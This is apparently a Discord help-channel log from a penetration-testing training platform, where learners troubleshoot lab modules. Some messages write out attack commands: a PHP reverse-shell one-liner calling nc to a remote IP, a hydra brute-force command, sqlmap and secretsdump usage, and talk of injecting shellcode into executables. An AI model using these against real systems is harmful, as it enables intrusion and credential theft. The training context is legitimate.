@north rapids

#

gift him some NITRO

#

JAJAJAJAJA

north rapids
#

thx for the heads up

#

yeeeeeted

lethal atlas
#

I run Kali from a hyperv server on an enterprise network and rarely have issues with communication but every now and then (like 3 times) I have had to use the pwnbox to get something to work.

west canopy
#

is hyperv nice?

#

i think you are the first person i've met who uses it

lethal atlas
#

Actually its not bad, but to get the gui to work for RDP took some setting up. At my home I have a dedicated Dell poweredge server that I use, and I gotta say its so much faster that way lol

#

I only use it here because of course the memory and storage options are sooo much better on the hyperv server than my desktop

west canopy
#

so do you have essentially a bare metal metal kali/parrot machine on your home server?

#

or wait

#

nevermind i'm stupid

#

wait what

#

whats a power edge server

lethal atlas
#

Home: Dell poweredge server dual processor, with 5 TB in Raid array running Kali linux

west canopy
#

is the kali running off virtualization software

lethal atlas
#

no its installed directly

west canopy
#

ah

#

ok badass

lethal atlas
#

very similar to this

#

At work I am running off the university servers via hyperv. Tons of memory and storage available that way, but doing everything over a vpn is kind of slow if im not on campus

raven cairn
#

Huge Flex 💪

west canopy
#

Anyone ever seen this error? Trying to use xfreerdp from the Pwnbox:

west canopy
#

Ok it turns out running as root was messing it up

lethal atlas
#

good to know..

radiant dagger
#

Hey man, have you figured it out? Could you please give me a nudge for that

lethal latch
#

DM me

woven copper
#

Hi everybody , I am on the RDP and SOCKS Tunneling with SocksOverRDP module , when i am trying to connect to the server on the 172.16.6.155 with jason credentials , its just fall down and send me this , anyone could give me a hint ?

radiant dagger
#

Can anyone help me on the ACTIVE DIRECTORY ENUMERATION & ATTACKS please?
Attacking Domain Trusts - Child -> Parent Trusts - from Linux. Perform the ExtraSids attack to compromise...

#

I think I compromised the machine but how to obtain the NTLM hash for the Domain Admin user bross after compromising the parent domain? really stuck on that for hours

west canopy
#

@radiant dagger Try running secretsdump.py , i was able to authenticate with the adunn user we discovered in a previous section

tulip dew
#

I did not understand the trick challenge and what is required of me to do. Can someone guide or help me, please?

radiant dagger
boreal sun
#

anyone around for a nudge on a specific LDAP query to look at GPO/password settings?

sand bolt
#

i dont know hot to set up my vpn in the server
i use kali kinux

idle kestrel
#

I'm working on Password Attacks: Credential Hunting in Linux and I'm unable to brute force the initial password that's needed before the machine goes down. I've tried hydra and medusa and ftp and ssh. I've used the mutated password list and the regular password list. Could someone please DM the initial password?

pine cargo
#

I used the hint to finish footprinting easy, but what is the official way? I'm trying bruteforcing with medusa and it's pretty slow

#

now using hydra, couldn't fix medusa's speed in pwnbox

woven copper
#

On the Pivoting, Tunneling skills assesment , is there any mod that I can DM ? , i think something is not working properly on the lab

woeful oxide
#

Hello Guys!, finally on the last part of the hashcat module (I've enjoyed it very much ) but I don't really know how to extract the hashes from this file, maybe you could guide me a little bit so I cant get a foot on this. Thanks!

west canopy
#

@woeful oxide DM me 🙂

pliant summit
#

hey, looking for help in the metasploit module. Im on the sessions & jobs section. I found the service which is el finder and now need to find an exploit for it, which I found, however when i run it, the session cannot be created. Can someone help?

tepid jolt
#

Hi, I am looking for some guidance in FILE UPLOAD ATTACKS module; Blacklist Filters. I cant seem to find any working php payload all I get is black screen. I have checked that I am using correct extensions.

vital adder
vital adder
#

any help for the Broken Authentication module Skill Assessment i got the support account but don't know how to decode the cookie

pliant summit
vital adder
pliant summit
vital adder
pliant summit
#

unix/webapp/elfinder_php_connector_exiftran_cmd_injection

vital adder
pliant summit
vital adder
pliant summit
#

yea but how to know which one to use without trying both

#

or maybe it's possible with the module i selected?

vital adder
vital adder
pliant summit
#

okay, if someone knows if the other module works as well, or how to determine which to choose, please let me know. Thank you though

daring sluice
#

hi guys

acoustic owl
rustic sage
#

Can anyone give a nudge for the sql injection fundamentals final assesment. Still stuck at the login screen.. (figured it out, for anyone stuck on this look at the cheat sheet...)

tiny ledge
#

Need some serious help with the Broken Authentication - Skills Assessment, been stuck for days

steep oxide
#

hi guys, im stuck at brute force module 'skill assessment-website' Once you access the login page, you are tasked to brute force your way into this page as well. What is the flag hidden inside? , my command was hydra -l user -P '/home/wilsonchuah/SecLists/Passwords/Leaked-Databases/rockyou.txt' -f 157.245.33.77 -s 30896 http-post-form "/admin_login.php:username=^USER^&password=^PASS^:F=<form name='log-in'" , but the estimated time is 240 hours , am i in the correct direction ?

paper crag
paper crag
spare condor
#

Hello! Someone to DM about Footprinting Lab - Medium?

#

in cmd?

#

I think it depends where you type, that's very general 😛
If you mean for example, cmd, one way I can think of is the autocomplete with [Tab] (you have to type only first letters correctly).
(Maybe someone else can give you a better answer, dunno)

spare condor
west olive
#

hey, i need help at Vulnerability Assessment to the nessus skill asesment at the first and last question, anyone who can help me?

tiny ledge
#

Anyone help me with command; sed , awk, grep or such, that will remove all the words from my list that do not have any special characters

rustic sage
tiny ledge
acoustic owl
timber tide
#

Hey All, i'm on the last question for AD Enumeration & Attacks, Skills Assessment 1: Take over the domain and submit the contents of the flag.txt file on the Administrator Desktop on DC01. I'm running into an issue with how to go about doing the DCSync attack with the user credentials i obtained in the previous questions. Any assistance would be appreciated!

west canopy
#

@timber tide i just used proxychains + secretsdump.py and authenticated as the ||tpetty ||user

timber tide
#

Thanks.... i think the proxychains is the piece I'm missing

timber tide
west canopy
#

sure

rustic sage
boreal sun
#

can anyone help with a nudge on the Active Directory LDAP final section? getting stuck on identifying user privs

west canopy
#

@boreal sun for the last question on the skill assessment, try running whoami /priv from an elevated powershell

boreal sun
west canopy
#

You're not the first person who i have talked to who had this issue. When i last tested it, i was able to run powershell as administrator and still do it as htb-student

boreal sun
#

ty for the help mate

west canopy
#

np 🙂

boreal sun
#

thanks!

west canopy
#

sweet!

lethal latch
#

could anyone point me in the right direction on broken authentication predictable reset token? i cant figure out for the life of me why its not working

mystic edge
#

Hi averyone

#

how to escalate the system over application

devout bear
#

rdp commandline errors in module. cant seem to connect to any htb sutdent

lethal atlas
#

@devout bear post your command and the error

devout bear
#

sure

#

xfreerdp /v:<target IP address> /u:htb-student /p:<password>

#

@lethal atlas Thumbprint: c7:53:c8:76:45:0c:ba:59:a8:7c:a3:f9:a5:a5:4a:55:da:1b:06:76:b8:36:e3:97:04:59:19:63:7c:a1:07:b3
The above X.509 certificate could not be verified, possibly because you do not have
the CA certificate in your certificate store, or the certificate has expired.
Please look at the OpenSSL documentation on how to add a private CA to the store.
Do you trust the above certificate? (Y/T/N)

#

/rank

mystic edge
#

Who are solved knowledge check on gettting started module?

lethal atlas
tiny ledge
#

Can someone help me, how to prevent the 'Too many login attempts' in Broken Authentication -- Skill Assessment? I'm trying the: X-Forwarded-For: 127.0.0.1 as taught in the module, but It's not working

lethal atlas
tiny ledge
acoustic owl
devout cliff
tiny ledge
devout bear
lethal atlas
devout bear
#

seems unsecure

lethal atlas
#

All the message was saying is that particular certificate was not found on your system.

devout bear
#

correct...which is new for me

#

ill accept it.

#

thx

lethal atlas
devout bear
#

ahh ok. thx. much appreciated

lethal latch
#

could anyone help me out with broken authentication predictable reset token? i have tried just about everything i could think of and still nothing

west canopy
#

@lethal latch DM me 🙂

ebon pine
#

hi everyone i have been stuck on getting a foothold for a minute on getting started. from my understanding i create a php file with the below script
<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.109 4444>/tmp/f"); ?>

upload it to the image section of the nibbleblog and then the use netcat to listen to the 4444 port but everytime i do it i get the same error saying its an invalid local port

#

is there something I am doing wrong here?

west canopy
#

can i see your netcat command

ebon pine
ebon pine
west canopy
#

try running as sudo

ebon pine
#

same result

west canopy
#

try doing: nc -lvnp 4444

#

i don't think the order of the options should matter but worth a shot

ebon pine
#

well today we both learned it does lol

west canopy
#

nice

ebon pine
raven cairn
#

I've been trying really hard on the information gathering web edition module. Frankly I find it to be the most difficult module I have done. Could I have some help with the skill assesment??

west canopy
#

@raven cairn i got you dawg

raven cairn
#

I think a question in the module might not be working. Can someone double check???

#

Has anybody been able to get this question?

cursive cave
#

Hi guys, I'm currently doing the HTTP web requests module

#

heres a question from that module

#

The server above loads the flag after the page is loaded. Use the Network tab in the browser devtools to see what requests are made by the page, and find the request to the flag.

#

/flag_327a6c4304ad5938eaf0efb6cc3e53dc.txt

#

i got the flag

#

but it keeps saying my answer is incorrect

raven cairn
cursive cave
#

oooh

#

thanks

#

but this is the hint tho

#

Look for a request to a file called 'flag_...'. If you can't find it, refresh the page and monitor new requests.

raven cairn
#

This didn't work for me. Are you sure this works?

vital adder
raven cairn
#

Port-scanning something you don't have permission to is usually a big no no

cursive cave
#

@raven cairn ayyyy it worked tysm

west canopy
#

Yes typically we shouldn't be nmapping public websites or IP's

west canopy
#

Well the module differentiates between active and passive information gathering

#

but it has you do active reconnaissance on other public targets i believe

#

i feel like using curl and using nmap aren't that different in the grand scheme of things.

#

Yea there's no law against port scanning so it's more like an ethical issue

upper vault
#

as long as you aren't actively disrupting service, im sure

#

not to mention any company with a program would be used to people scanning them

upper vault
#

yup. I wonder about that though, if you're testing through a popular VPN if it'll start denying service through that node. Do providers rotate their node IPs so they don't get blacklisted?

#

I'm guessing they would anyway, as a routine of security

frigid vector
#

Hey guys. Traffic analysis module (chapter: Interrogating Network Traffic With Capture and Display Filters)
question: What are the client and server port numbers used in first full TCP three-way handshake? (low number first then high number)
I know the answer and see that handshake (the answer consists of two ports) but it's still incorrect and I don't understand what kind of answer this question wants about.

west canopy
#

@frigid vector DM me 🙂

devout cliff
#

i think it was a Jack Rhysider video i heard about it from first. The one he talked about i believe was bots that would scan ports, find your ssh port, and then try to login with default credentials.

rough thunder
#

Can anyone help with the Metasploit module?

#

Specifically the 'meterpreter' lesson

polar widget
rough thunder
#

My question is related to the very first part so no spoilers... I have no idea what exploit to use on what port. I have tried so many things with nothing to get me started. I have seriously tried for days

#

feel free to DM me any help if you can

rough thunder
polar widget
vital adder
#

hi, i need some help for the Broken Authentication module Skill Assessment i got the support account but don't know how to decode the cookie

rustic sage
vital adder
rustic sage
#

Not 100% sure but would burp suite be the tool?

vital adder
rustic sage
manic ermine
#

can anyone give me a nudge wth the file upload attacks skills assessment? I have found a handful of extensions that work, I know where the uploads end up, but for the life of me, I can't do both at the same time!

vital adder
vital adder
devout cliff
manic ermine
vital adder
manic ermine
broken warren
#

Has anyone had trouble staying connected to a target? Everytime I spawn a new target and try to navigate to it. The wait time is incredibly slow and, within ten minutes I get "unable to connect" even to a page that I was previously connected too.

vital adder
vital adder
hazy cradle
#

Hi Team, Need help with answers to 'Sessions' chapter within 'Using Metasploit Framework' Module. Is there any walkthrough or any other demonstration/notes ?

devout cliff
#

So just rotate them and only seriously answer the guessable one

devout bear
#

this place is awesome

vital adder
devout cliff
paper crag
#

This is still a problem for me...It worked once when I tried a different VPN but it no longer works...is there a general problem with this module?

valid finch
#

stuck on the second question for conditional statments and loops of the python module
I writen the script and it works but the website won't accept my answer. code block 2

lucid mirage
#

just print the variable.

valid finch
devout bear
#

got onto free rdp conected to an empty workstation with just a recycle bin...no drives no directories...cant answer the questions

boreal sun
#

am i missing something in the bloodhound module? im not seeing a windows instance to start for testing against - the only thing i can spawn is the pwnbox

devout bear
#

nvm got it

boreal sun
west canopy
#

@boreal sun Yes, I had to use Pwnbox because the bloodhound on my VM was not compatible with their data

#

@boreal sun First section there is no target and they give you the data to analyze. The second section you actually connect to a target and run a collector, then analyze.

boreal sun
#

thanks mate

west canopy
rugged stag
#

Hi, have you been able to solve that? I'm having the same problem. I got the shell, tried several exploits for "sudo", none of them seem to work... Thanks

devout bear
#

@west canopy do you biohk with TRT?

west canopy
#

i take a cheque drop every morning instead of drinking coffee

west canopy
#

@rugged stag DM me 🙂

golden hornet
#

Hi everyone I have a problem at module Web Attacks section Blind Data Exfiltration . Can someone help me ?

west canopy
#

@golden hornet i might be able to help, DM me

golden hornet
#

ok

real hill
#

Am I doing this wrong? SQLMap module:
I'm getting this everytime I try to solve case #8, by using this command: sqlmap 'http://159.65.29.54:32279/case8.php' --data 'id=1&t0ken=7Y4mOvfC21UegPCj3fNcRGkWyhaY0fWVEWMszissHk' --csrf-token='t0ken' --batch

acoustic owl
summer lake
#

Hi can anyone assist with windows privilege escalation dnsadmin section?

#

Read from forums that we should use msfvenom reverse payload. but the dns can't seem to start backup

delicate drum
#

Hey, I'm currently on Web Info Gathering module and i don't quite understand how do i pass Active Infrastructure Gathering with these vHosts

#

What am I supposed to do here, i haven't found how vHosts operate in any other sections

upper vault
#

@delicate drum are you on the 'Active Infrastructure Identification' section?

delicate drum
#

Yeah

upper vault
#

have you edited your /etc/hosts?

delicate drum
upper vault
#

thats it

lethal atlas
#

thats definitely it

delicate drum
#

Haven't found anything about that in the module tho

upper vault
#

it's in earlier modules, but essentially, servers that are running seperate web-apps are 'virtual hosting', providing seperate sites on the same ip, same server

delicate drum
#

Read about that, but didn't see how to setup one, or if that's even needed

#

Btw I'm using already built path from the academy and went thought all the modules before this one, perhaps I've missed something about them

lethal atlas
#

Because the websites you are trying to access are not listed on any dns server. IE not public. you need to make an entry in your /etc/hosts file so that your OS knows where to find that name.

delicate drum
#

Oh that actually makes sense now

lethal atlas
#

that is why you provide an IP and the domain name

delicate drum
summer lake
lethal atlas
#

@summer lake I cant help. I havent done that module yet

upper vault
#

@summer lake lol sry dude I haven't got that far yet

lethal atlas
#

maybe if @west canopy is on he can help

delicate drum
upper vault
#

you can 'sudo cat /etc/hosts'

#

to see what's there

summer lake
#

nano /etc/hosts

lethal atlas
#

here is an example..

summer lake
#

and add the ip with the corresponding domain name

delicate drum
#

thanks mates <3

upper vault
#

👍

delicate drum
#

1 more thing, what's the format i use to access vHosts, vHost@ip or?

upper vault
#

nope, just like a normal url

#

*.local

delicate drum
#

makes sense

#

gotem

upper vault
#

fun project, you can set up a local webserver on your LAN, then you can add it to your /etc/hosts file with whatever URL you want, as it takes precedence over other DNS sources, and when you type it into your browser it will come up

#

that, and if you have a cloud server running somewhere, you can do the same thing, saves from having to remember the IP. You could make it "mycloudserver.me"

west canopy
#

@summer lake this section took me several attempts and I had to respawn the target several times. I don't recall any particular trick to making it work besides working through the steps as slowly and meticulously as possible.

summer lake
west canopy
#

yea i ran into that

summer lake
#

Tried it more than 10x. only worked twice with the cmd dll so far.

summer lake
west canopy
#

eventually i got a reverse shell to work

summer lake
paper crag
#

Wha is going on with this academy Tunnelling and Port Forwading Module? I keep getting this after connecting to the VPN and trying to SSH to the attack host: I'm seriously considering cancelling my subscription...this is unacceptable

west canopy
#

@paper crag which section is that? I can test on my end.

paper crag
west canopy
#

Working fine on my end:

delicate drum
#

I'm still stuck on the same module, can't find FQDN from an iP address

normal marsh
delicate drum
#

not sure, whatever i try i get DOMAINX error

#

or something along those lines

#

but I've tried dig any, shouldn't that do the -x too?

normal marsh
#

hmm, just remembered that whois might work for ya

#

heck, i don't supposed ping resolves it for ya, does it?

delicate drum
#

whois outputs thats its a private registered ip

#

ping doesn't respond

#

I might have misconfigurated something perhaps?

normal marsh
#

Which module? I'll check my notes, or just spin it up.

delicate drum
#

Web Information Gathering, Active Infrastructure Identification section

#

I've somehow, not even I know how managed to get some questions right, but I can't get the FQDN from those 2 IPs provided in the questions

oblique acorn
#

Can someone nudge me on the "Attacking common application" module?
Stuck at tge Wordpress - Discovery & Enumeration questions.
Can't seem to find what is needed, although not enough info from the course, tried everything manually

west canopy
#

@oblique acorn Edit: Which question are you stuck on?

carmine wadi
#

any luck?

raven cairn
#

Can I have help decoding the cookie? I don't know how I am supposed to do this without help...

upper vault
#

@raven cairn I'm not an expert, but I believe cookies are url encoded before they're sent, have you url decoded it yet?

upper vault
#

Cool, then since they've said its md5, and that the last character is missing, either find a tool to append the string with each alphanumerical and decode md5 until it works, or just add them on yourself and decode

#

you could probably also make a bash script, and use md5sum to fiddle with it

mellow maple
#

hey guys, I need help with the INFORMATION GATHERING - WEB EDITION/Active Subdomain Enumeration, in the question of the 2 ips, I try the subdomains commands but got me the NXdoamns

upper vault
#

@mellow maple what did you use to enum?

mellow maple
#

yes but got one zone

silver laurel
#

I have a question regarding the sqlmap modules. For flag 7 I ran a command I thought would work and it didn't, i slightly altered the command and it didn't work, so naturally I ran the first command and it worked....is this normal sqlmap behavior?

raven cairn
#

I doubt it was a problem with the tool tbh

silver laurel
#

hmmmm on the pwnbox end, maybe. Just wondering if anyone has had similar behavior

raven cairn
#

I've never had that happen to me.

#

(Also if anybody is still here I am still suffering on the skill assesment)

mighty pivot
#

Hey all, while doing a Linux module, the question is “What is the name of the config file that has been created after 2020-03-03 and is smaller than 28k but larger than 25k?”
Now I found the correct file, but when I look at the file more closely, the size is 34266. I don’t understand how that’s the right answer, as 34266 is not smaller than 28k…. Am I missing something obvious?

raven cairn
mighty pivot
#

Actually the kb- byte thing still doesn’t account for the number

polar widget
#

DM me we'll look into it

lament charm
#

hi everyone, have you finished file inclusion module?

white mulch
#

Hey guys in the Information Gathering module under the Active Infrastructure Identification, I added the hosts. on /etc/hosts

#

After that also the domains app.inlanefreight.local and dev.inlanefreight.local is not showing up

#

Can someone help me out?

hazy cradle
#

Module: Using Metasploit Framework, section : Session & Jobs , The target system has an old version of Sudo running. Find the relevant exploit and get root access to the target system. Find the flag.txt file I have found relevant exploit using local_exploit_suggester, which syas that exploit/linux/local/su_login: The target appears to be vulnerable.

#

However, when I used that exploit, it says "[*] Exploit completed, but no session was created.
"

#

Could someone help?

delicate drum
#

I believe I had problems trying to solve it using zap

delicate drum
delicate drum
#

try changing the RPORT to something else

#

maybe the app is listening on a specific one

fathom lotus
#

guys is it posible to inject payload into a normal .exe and then get a meterpeter shell out of it once executed?

polar widget
#

You can inject malicious shellcode straight into legitimate binaries too

fathom lotus
#

but do av softwares pick it up?

polar widget
#

Depends

fathom lotus
#

what do you mean?

#

depends on the software or

#

also, so it deosnt have to be an exploit? it can just be a reverse shell payload and work?

polar widget
#

Very helpful in windows privilege escalation

fathom lotus
distant stream
polar widget
#

Yo @mortal basin

#

I noticed something very very very weird about burp suite community edition while doing "Using web proxies" module,

#

I need to show you that stuff
Can I DM you?

drifting knoll
#

@delicate drum pls be careful with spoilers...

mortal basin
delicate drum
broken warren
#

On the skills assessment for hacking WordPress. I've tried two methods for obtaining shell, but no luck. I'm confident Im on the right track I just can't figure out why I'm getting the errors I'm getting. Any help would be 😃

broken warren
#

I keep getting my payload listed on the page

trail pendant
#

Anyone online who solved the Password Attacks: Password mutations? Used 3 hours bruteforcing and this is starting to feel ridiculous. The instructions seems clear, but just keep slashing at the box seems obnoxious. Anyone? 🙂

languid dawn
#

Just bruteforcing or are you using rules?

trail pendant
#

The zip comes with a password list and a rules list. Both are used, cutting dublicates. I now separatet the mut_password.list into files based on length and started with word length of 8, then 9 and now I am on 10. I feel like this is taking way too long.

#

Already read a hint of using ftp instead of ssh because it is faster. So I am already doing that

trail pendant
#

Got it! It is not okay that it should take this long! 😢

languid dawn
#

I would suggest investigating why it took so long, afaik HTB always makes sure that when bruteforcing is involved the time needed is short

#

at least for the main platform, I have no idea if they keep that philosophy for academy

last grail
#

Hey, new here. I could use some kind of help\lead on broken auth skill assessment.

lethal atlas
silver laurel
#

does anyone have a hint for dealing with [ERROR] unable to retrieve the number of columns for table 'tbl_a' in database 'db_a' when using sqlmap

west canopy
#

you can break his authentication but you can't break his spirit!

delicate drum
#

Anyone up to help me solve questions in Information Gathering - Web Edition > Active Subdomain Enumeration, can't seem to find FQDNs from gives IPs?

lethal atlas
delicate drum
#

but theres like 20 subdomains

lethal atlas
#

yeah, sounds about right

delicate drum
#

so i have to go though all of em until i find coorespoding ip?

lethal atlas
#

yes

delicate drum
#

nice

lethal atlas
#

luckily its not far down the list.

west canopy
#

I feel like that section needs to be updated with better directions. Literally everyone gets stuck on that section , myself included.

lethal atlas
#

ikr

#

I bet its the most asked question in here

west canopy
#

i see it get asked about at least once every two days

delicate drum
#

This is my first time getting stuck for more than half an hour

#

Been here for a day and still can't even grasp

lethal atlas
#

Im stuck on the machine Trick on HTB

delicate drum
#

I've done the easy ones and went straight to academy

#

What am i doing wrong, the ip is generated and ns.inlanefreight.htb is nameserver

lethal atlas
#

your not trying the transfer on a subdomain

delicate drum
#

ive gotten the list of all subdomains somehow yesterday and now cant manage to do it again xd

lethal atlas
#

nslookup -query=AXFR inlanefreight.htb ns.inlanefreight.htb
or
nslookup -query=AXFR inlanefreight.htb <target ip>

delicate drum
lethal atlas
#

is your target active or did it timeout

delicate drum
#

active i suppose

lethal atlas
#

and is that entry in your /etc/hosts?

delicate drum
#

maybe something wrong here

west canopy
#

try running the command: dig axfr inlanefreight.local @ipaddress

#

but replace inlanefreight.local with a subdomain

#

and go down the list

#

you keep the original IP address of the spawned target

#

and then try doing a zone transfer against each subdomain

#

i never did anything with my hosts file.

delicate drum
#

im really dumb

#

how do i retrive the subdomains

lethal atlas
#

@west canopy how did you communicate with inlanefreight.htb without changing your hosts file

#

it shouldnt know how to find it

west canopy
#

it's a dns zone not a vhost

#

one sec let me test from pwnbox

#

real quick

#

Yea i just tested and you don't need it in hosts file

delicate drum
#

maybe it being there conficts it

lethal atlas
#

interesting. Im not sure how that works but ok

pallid breach
#

academy, module 77 section 726

#

what's bob's password for God's sake

devout bear
#

I cannot figure this out for the life of me. Its probably something very simple

#

What is the alias set for the ipconfig.exe command?

hazy cradle
#

Module: using MSF, section: Meterpreter

#

nmap shows this

#

PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5000/tcp open upnp

#

how to select right exploit from this info ?

rustic sage
#

try with -sC -sV

#

to see version

hazy cradle
#

thanks..let me try

hazy cradle
rustic sage
round magnet
#

Can i get an admin to help with the AD enum and exploit module

#

im on the last part skill test 1

#

Confused on how to get to MS01 for this question: Submit the contents of the flag.txt file on the Administrator desktop on MS01

naive ravine
#

Can anyone guide on the following:

I am reading through the Web Attacks - Out-of-bound data Exfiltration section. The following command is used in BurpSuite:

#

Should there be more XML in the request shown in BurpSuite?

#

At one point the notes / text mentions the following:

#

Then the subject changes to creating the php script

west canopy
#

@round magnet we need to set up port forwarding , in order to pivot to machines on the 172.16.6.0 network. If you need help feel free to DM me 🙂

boreal sun
#

anyone around for a nudge on the last question for the "putting it all together" in the bloodhound module? every query ive run is returning me a "dive by zero" error

upper vault
#

lol, sry havent done it

boreal sun
#

all good homie! i wanted to give @west canopy a break from answering me lol

upper vault
#

hah, ya I can't wait to get to that point, teaching is supposed to really drill in the knowledge

#

@boreal sun When you're at that point i'm sure I'll be the one asking you everything

weary stream
#

anyone has a clue why vimtutor doesn't run once I enter the command?

#

Returns the following bash: vimtutor: command not found

west canopy
#

@weary stream looks like it needs to be installed

weary stream
#

hmm weird thought it would come in standard when vim is installed on pownbox

west canopy
#

i think we can just sudo apt install vimtutor

upper vault
#

so i'm doing Teir 1 starting point, box 8. Tactics, simple SMB login, and writeup recommended trying the -impacket- framework, ran into a missing module issue, and forum fix was to use "$: sudo pip3 install . " works like a charm, but I'm confused, I thought pip3 was a package manager type thing like apt or rpm, and I don't see anything new installed in the directory, so what happened?

weary stream
#

Weird right?

gilded sonnet
#

Flag5 on SQLmap essential not working, any one can help with that??

rustic sage
#

after this night if still issue dm me

round magnet
sly tangle
#

Hello there, I'm kinda lost at LFI assessment module, I've tried multiples ways to bypass it but I ain't able to do it, could I get some of help? Thanks!

mortal nebula
#

Can someone help me ? i am doing the setting up module but at some point i cant follow the steps becouse i have something else ? i downloaded parrot but i dont have the thing called "bash"

upper vault
#

bash is the interpreter in your terminal, or command line

mortal nebula
#

what should that mean ? (i am very sorry about the dump questions just it dont work and i dont know why)

upper vault
#

np, so look through your utilities or programs, find something called 'terminal', its where you'll enter commands for programs and other stuff

#

bash is the interpreter that will run what you type in there, it's not something you'll have to install

#

I'd hit up youtube, and search for 'bash tutorial', or 'terminal tutorial linux', it'll help you out more than I could

mortal nebula
#

Thank you so much !

upper vault
#

np, glad i could help

potent badger
#

I'm doing the windows Fundamentals Module
In the windows services and processes section, even if I'm 99% sure I'm submitting the right answer it does not accept it

#

Anyone had the same problem? Or anyone that can help me more in depth? Maybe I just think that is the right answer but is not...

upper vault
#

sometimes, i've found some modules require your answer to fit their format, like include quotes or dashes or slashes, i've gotten hung up a few times that way

potent badger
#

"Identify one of the non-standard update services running on the host. Submit the full name of the service executable (not the DisplayName) as your answer."

#

But this looks like a well specified question

#

It even specify that I need to write the Name and not the Display Name

#

mba

mortal nebula
#

Btw guys how i am supposed to buy tier 1 module if i only have 40 cubes ? like is there a way to farm cubes or the only way is to buy them

upper vault
#

@potent badger I haven't done that module, so unfortunately I can't help that much

potent badger
upper vault
#

👍